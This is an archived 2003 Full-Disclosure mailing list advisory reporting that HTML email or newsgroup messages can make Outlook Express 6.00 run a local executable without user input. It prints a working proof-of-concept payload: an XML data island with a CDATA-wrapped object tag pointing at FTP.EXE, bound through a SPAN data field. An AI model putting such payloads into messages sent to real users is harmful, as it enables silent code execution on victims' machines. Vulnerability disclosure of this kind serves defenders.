[Full-Disclosure] O UTLO OK EXP RE SS 6 .00 : broken
From: http-equiv@excite.com
Date: 02/22/03
- Previous message: Karol Wiêsek: "[Full-Disclosure] multiple vulnerabilities in glftpd"
- Next in thread: Schmehl, Paul L: "RE: [Full-Disclosure] O UTLO OK EXP RE SS 6 .00 : broken"
- Maybe reply: Schmehl, Paul L: "RE: [Full-Disclosure] O UTLO OK EXP RE SS 6 .00 : broken"
- Reply: Thor Larholm: "Re: [Full-Disclosure] O UTLO OK EXP RE SS 6 .00 : broken"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <full-disclosure@lists.netsys.com> From: "http-equiv@excite.com" <http-equiv@malware.com> Date: Sat, 22 Feb 2003 14:41:09 -0000
Saturday, February 22, 2003
Technical silent delivery and installation of an executable no client
input other than reading an email or viewing a newsgroup message.
Outlook Express 6.00 SP1 Cumulative Pack 1 2 3 4 whatever.
This should not be possible.
When viewing an email message or a newsgroup message, Outlook Express
creates a temp file in the Internet Explorer cache. From here
security should be governed by Internet Explorer's security settings.
In an html email with internet zone applied, this will not function:
<object classid="clsid:11111111-1111-1111-1111"
codebase="C:\WINDOWS\FTP.EXE"></object>
[screen shot: http://www.malware.com/tsktsk.png 11KB]
In an html email message or newsgroup message with internet zone
applied this will function:
<xml id=oExec> <security><exploit> <![CDATA[ <object id="oFile"
classid="clsid:11111111-1111-1111-1111"
codebase="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html
dataSrc=#oExec></SPAN>
courtesy of: http://sec.greymagic.com/adv/gm001-ie/
[screen shot: http://www.malware.com/tsktsktsk.png 11KB]
NOTE: that default installations of Outlook Express 6.00 are with
restricted zone applied. However there still remain many 'happy
people' out there that enjoy their html mail messages and html
newsgroup messages, and coupling the above with any one of a million
other unsolved problems now and in the future with Internet Explorer
and Outlook Express, including a new
http://www.malware.com/stench.html we are back in business.
Notes: This is supposed to be patched:
http://microsoft.com/technet/security/bulletin/MS02-015.asp 28 March
2002
Keywords: experts Academic Advisory Board Think Tank security concepts
-- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
- Next message: Schmehl, Paul L: "RE: [Full-Disclosure] O UTLO OK EXP RE SS 6 .00 : broken"
- Previous message: Karol Wiêsek: "[Full-Disclosure] multiple vulnerabilities in glftpd"
- Next in thread: Schmehl, Paul L: "RE: [Full-Disclosure] O UTLO OK EXP RE SS 6 .00 : broken"
- Maybe reply: Schmehl, Paul L: "RE: [Full-Disclosure] O UTLO OK EXP RE SS 6 .00 : broken"
- Reply: Thor Larholm: "Re: [Full-Disclosure] O UTLO OK EXP RE SS 6 .00 : broken"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
